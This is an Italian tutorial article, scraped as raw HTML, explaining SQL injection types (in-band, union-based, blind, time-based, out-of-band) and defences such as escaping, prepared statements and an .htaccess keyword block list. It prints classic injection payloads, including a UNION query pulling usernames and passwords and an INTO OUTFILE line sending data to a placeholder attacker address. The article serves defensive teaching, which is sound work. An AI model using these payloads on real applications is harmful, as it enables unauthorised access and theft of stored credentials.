Cos’\u00e8 una SQL injection?<\/h2>\n
L’SQL (Structured Query Language) \u00e8 un linguaggio che ci permette di interagire con i database<\/a>. Le moderne applicazioni web utilizzano i database per gestire i dati e mostrare contenuti dinamici ai lettori.<\/p>\n Una SQL injection (o SQLi) si verifica quando un utente cerca di inserire istruzioni SQL dannose in un’applicazione web. Se ci riesce, sar\u00e0 in grado di accedere ai dati sensibili del database.<\/p>\n Nel 2023, le SQL injection rimangono tra gli attacchi pi\u00f9 comuni sul web. Solo nel 2022 sono state aggiunte 1162 vulnerabilit\u00e0 di SQL injection<\/a> al database di sicurezza CVE.<\/p>\n La buona notizia \u00e8 che le SQL injection non sono pi\u00f9 cos\u00ec diffuse come un tempo. La maggior parte delle applicazioni si \u00e8 evoluta per proteggersi dagli attacchi SQL.<\/p>\n Nel 2012, il 97% di tutte le violazioni di dati<\/a> era dovuto a iniezioni SQL. Oggi questo numero \u00e8 ancora alto, ma molto pi\u00f9 gestibile.<\/p>\n Una vulnerabilit\u00e0 SQL injection consente a un aggressore di accedere completamente al database dell’applicazione attraverso l’uso di istruzioni SQL dannose.<\/p>\n Vediamo un esempio di applicazione vulnerabile.<\/p>\n Immaginate il flusso di lavoro di una tipica applicazione web che prevede la richiesta di database attraverso gli input dell’utente. Si prende l’input dell’utente attraverso un modulo, ad esempio un modulo di login. Quindi si interroga il database con i campi inviati dall’utente per autenticarlo. La struttura della query al database \u00e8 simile a questa:<\/p>\n Per semplicit\u00e0, supponiamo che si stia memorizzando le password in chiaro. Tuttavia, \u00e8 buona norma eseguire il salt delle password<\/a> e poi l’hash. Se avete ricevuto il nome utente e la password dal modulo, potete definire la query in PHP come segue:<\/p>\n Se qualcuno inserisce il valore “admin’;-” nel campo del nome utente, la query SQL che la variabile $db_query genera sar\u00e0 la seguente:<\/p>\n Cosa fa questa query?<\/p>\n Un commento in SQL inizia con un doppio trattino –, quindi tutto ci\u00f2 che segue viene ignorato. Questo rimuove di fatto il controllo della password dalla query. Di conseguenza, se “admin” \u00e8 un nome utente valido, chi attacca pu\u00f2 accedere senza conoscere la password. Questo almeno se non ci sono misure di sicurezza contro questo tipo di attacchi.<\/p>\n In alternativa, in questo esempio \u00e8 possibile utilizzare un attacco booleano per ottenere l’accesso. Se un utente malintenzionato inserisce “password’ o 1=1;-” nel campo della password, la query risultante sar\u00e0 la seguente:<\/p>\n In questo caso, anche se la password \u00e8 sbagliata, verrete autenticati nell’applicazione. Se la pagina web visualizza i risultati della query del database, un utente malintenzionato pu\u00f2 utilizzare il comando per mostrare le tabelle, il comando per visualizzare le tabelle del database e quindi eliminare selettivamente le tabelle se lo desidera.<\/p>\n Exploits of a Mom, una popolare striscia a fumetti di XKCD, mostra la conversazione di una madre al telefono con la scuola di suo figlio, dove le viene chiesto se ha davvero chiamato suo figlio “Robert”); DROP TABLE Students; -“.<\/figure>\n Ora che conosciamo le basi di una vulnerabilit\u00e0 SQL injection, analizziamo i vari tipi di attacchi SQL injection e le ragioni di ciascuno di essi.<\/p>\n L’iniezione SQL in-band \u00e8 la forma pi\u00f9 semplice di SQL injection. In questo processo, chi attacca \u00e8 in grado di utilizzare lo stesso canale per inserire il codice SQL dannoso nell’applicazione e raccogliere i risultati.<\/p>\n Vediamo due forme di attacchi di SQL injection in-band.<\/p>\n Un attacco basato su errori avviene quando qualcuno manipola intenzionalmente la query SQL per generare un errore del database. Il messaggio di errore restituito dal database spesso include informazioni sulla struttura del database, che chi attacca pu\u00f2 utilizzare per sfruttare ulteriormente il sistema.<\/p>\n Ad esempio, un aggressore pu\u00f2 inserire ‘ OR ‘1’=’1 in un campo di un modulo. Se l’applicazione \u00e8 vulnerabile, potrebbe restituire un messaggio di errore che rivela informazioni sul database.<\/p>\n Gli attacchi SQL injection union-based utilizzano l’operatore SQL UNION per combinare i risultati della query originale con i risultati di query dannose iniettate.<\/p>\n Questo permette a chi attacca di recuperare informazioni da altre tabelle del database:<\/p>\n In questa query, l’operatore UNION combina i risultati della query originale con i risultati di SELECT username<\/em>, password<\/em> FROM user_table<\/em>. Se l’applicazione \u00e8 vulnerabile e non sanifica correttamente l’input dell’utente, potrebbe restituire una pagina che include nomi utente e password dalla tabella utenti.<\/p>\n Anche se un aggressore genera un errore nella query SQL, la risposta della query potrebbe non essere trasmessa direttamente alla pagina web. In questo caso, l’aggressore dovr\u00e0 indagare ulteriormente.<\/p>\n In questa forma di SQL injection, chi attacca invia diverse query al database per valutare come l’applicazione analizza le risposte. Un’iniezione SQL inferenziale \u00e8 talvolta nota anche come Blind SQL Injection.<\/p>\n Di seguito analizzeremo due tipi di iniezioni SQL inferenziali: SQL injection booleana e SQL injection basata sul tempo.<\/p>\n Se una query SQL produce un errore che non \u00e8 stato gestito internamente all’applicazione, la pagina web risultante pu\u00f2 lanciare un errore, caricare una pagina vuota o caricarla parzialmente. In un’iniezione SQL booleana, chi attacca valuta quali parti dell’input dell’utente sono vulnerabili alle iniezioni SQL provando due diverse versioni di una clausola booleana attraverso l’input:<\/p>\n Queste query sono progettate per avere una condizione che pu\u00f2 essere vera o falsa. Se la condizione \u00e8 vera, la pagina verr\u00e0 caricata normalmente. Se \u00e8 falsa, la pagina potrebbe caricarsi in modo diverso o mostrare un errore.<\/p>\n Osservando il caricamento della pagina, l’aggressore pu\u00f2 determinare se la condizione era vera o falsa, anche se non vede l’effettiva query SQL o la risposta del database. Se mettete insieme diverse condizioni simili, potrete estrarre lentamente informazioni dal database.<\/p>\n Un attacco SQL injection basato sul tempo pu\u00f2 aiutare un aggressore a determinare se una vulnerabilit\u00e0 \u00e8 presente<\/a> in un’applicazione web. Chi attacca utilizza una funzione a tempo predefinita del sistema di gestione del database utilizzato dall’applicazione. Ad esempio, in MySQL<\/a>, la funzionesleep()<\/em><\/a> indica al database di attendere un certo numero di secondi.<\/p>\n Se una query di questo tipo produce un ritardo, chi attacca sapr\u00e0 che \u00e8 vulnerabile. Questo approccio \u00e8 simile agli attacchi booleani in quanto non si ottiene una risposta effettiva dal database. Tuttavia, \u00e8 possibile ottenere informazioni se l’attacco ha successo.<\/p>\n In un attacco di tipo out-of-band SQL Injection, chi attacca manipola la query SQL per istruire il database a trasmettere i dati a un server controllato dall’aggressore. Questo avviene in genere utilizzando funzioni del database che possono richiedere risorse esterne, come ad esempio richieste HTTP o query DNS.<\/p>\n Un attacco di tipo out-of-band SQL injection utilizza una funzionalit\u00e0 di file process esterno del DBMS. In MySQL, le funzioni LOAD_FILE() e INTO OUTFILE possono essere utilizzate per richiedere a MySQL di trasmettere i dati a una fonte esterna.<\/p>\n Ecco come un aggressore potrebbe utilizzare OUTFILE per inviare i risultati di una query a una fonte esterna:<\/p>\n Allo stesso modo, la funzione LOAD_FILE() pu\u00f2 essere utilizzata per leggere un file dal server e visualizzarne il contenuto. Una combinazione di LOAD_FILE() e OUTFILE pu\u00f2 essere utilizzata per leggere il contenuto di un file sul server e poi trasmetterlo in un’altra posizione.<\/p>\n Finora abbiamo esplorato le vulnerabilit\u00e0 di un’applicazione web che possono portare ad attacchi di tipo SQL injection. Una vulnerabilit\u00e0 di tipo SQL injection pu\u00f2 essere utilizzata da un aggressore per leggere, modificare o addirittura rimuovere il contenuto del database.<\/p>\n Inoltre, pu\u00f2 anche consentire di leggere un file in qualsiasi punto del server e trasferirne il contenuto altrove. In questa sezione esploriamo varie tecniche per proteggere le applicazioni web e un sito web dagli attacchi di SQL injection.<\/p>\n In generale, \u00e8 difficile stabilire se una stringa dell’utente sia dannosa o meno. Per questo motivo, un approccio comune \u00e8 quello di sfuggire ai caratteri speciali nell’input dell’utente. Questo processo pu\u00f2 aiutare a proteggersi dagli attacchi di SQL injection.<\/p>\n In PHP, \u00e8 possibile eseguire l’escape di una stringa prima di creare la query utilizzando la funzione Quando si visualizza l’input dell’utente come HTML, \u00e8 anche importante convertire i caratteri speciali nei corrispondenti caratteri HTML per prevenire gli attacchi Cross-Site Scripting (XSS). Potete convertire i caratteri speciali in PHP utilizzando la funzione In alternativa, si possono utilizzare le dichiarazioni preparate per evitare le iniezioni SQL. Una dichiarazione preparata \u00e8 un modello di query SQL, in cui si specificano i parametri in una fase successiva per eseguirla.<\/p>\n Ecco un esempio di dichiarazione preparata in PHP e MySQLi:<\/p>\n Il passo successivo per mitigare questa vulnerabilit\u00e0 \u00e8 limitare l’accesso al database solo allo stretto necessario.<\/p>\n Ad esempio, potete collegare l’applicazione web al DBMS utilizzando un utente specifico che abbia accesso solo al database in questione.<\/p>\n Inoltre, dovrete limitare l’accesso dell’utente del database a tutte le altre postazioni del server. Potreste anche voler bloccare alcune parole chiave SQL nell’URL attraverso il server web.<\/p>\n Se utilizzate Apache<\/a> come server web, potete utilizzare le seguenti righe di codice nel file .htaccess<\/a><\/em> per mostrare un errore403 Forbidden<\/em><\/a> a un potenziale aggressore.<\/p>\n Prestate attenzione prima di utilizzare questa tecnica perch\u00e9 Apache mostrer\u00e0 un errore al lettore se l’URL contiene queste parole chiave.<\/p>\nCome funziona la vulnerabilit\u00e0 SQL injection?<\/h2>\n
select * from user_table\nwhere username = 'sdaityari'\nand password = 'mypassword';<\/code><\/pre>\n\/\/ Connect to SQL database\n$db_query = \"select * from user_table where\nusername = '\".$user.\"'\nAND password = '\".$password.\"';\";\n\/\/ Execute query<\/code><\/pre>\nselect * from user_table where\nusername = 'admin';--' and password = 'mypassword'<\/code><\/pre>\nselect * from user_table where\nusername = 'admin' and\npassword = 'password' or 1=1;--';<\/code><\/pre>\n![\"Exploits](\"https:\/\/kinsta.com\/wp-content\/uploads\/2023\/09\/sql-injection-cartoon.png\")
Tipi di SQL Injection<\/h2>\n
Iniezione SQL in-band<\/h3>\n
Attacco basato su errori<\/h4>\n
Attacco union-based<\/h4>\n
select title, link from post_table\nwhere id < 10\nunion\nselect username, password\nfrom user_table; --;<\/code><\/pre>\nSQL injection inferenziale (Blind SQL Injection)<\/h2>\n
Attacco booleano<\/h4>\n
\n
Attacco basato sul tempo<\/h4>\n
select * from comments\nWHERE post_id=1-SLEEP(15);<\/code><\/pre>\nIniezione SQL fuori banda<\/h2>\n
select * from post_table\ninto OUTFILE '\\\\MALICIOUS_IP_ADDRESSlocation'<\/code><\/pre>\nCome prevenire le SQL injection<\/h2>\n
Eseguire l’escape degli input dell’utente<\/h3>\n
mysqli_real_escape_string()<\/code>:<\/p>\n$unsafe_variable = $_POST[\"user_input\"]; $safe_variable = mysqli_real_escape_string($conn, $unsafe_variable);<\/code><\/pre>\nhtmlspecialchars()<\/code>.<\/p>\nUsare le dichiarazioni preparate<\/h3>\n
$query = $mysql_connection->prepare(\"select * from user_table where username = ? and password = ?\");\n$query->execute(array($username, $password));<\/code><\/pre>\nAltri controlli di igiene per prevenire gli attacchi SQL<\/h3>\n
RewriteCond %{QUERY_STRING} [^a-z](declare\u00a6char\u00a6set\u00a6cast\u00a6convert\u00a6delete\u00a6drop\u00a6exec\u00a6insert\u00a6meta\u00a6script\u00a6select\u00a6truncate\u00a6update)[^a-z] [NC]\nRewriteRule (.*) - [F]<\/code><\/pre>\n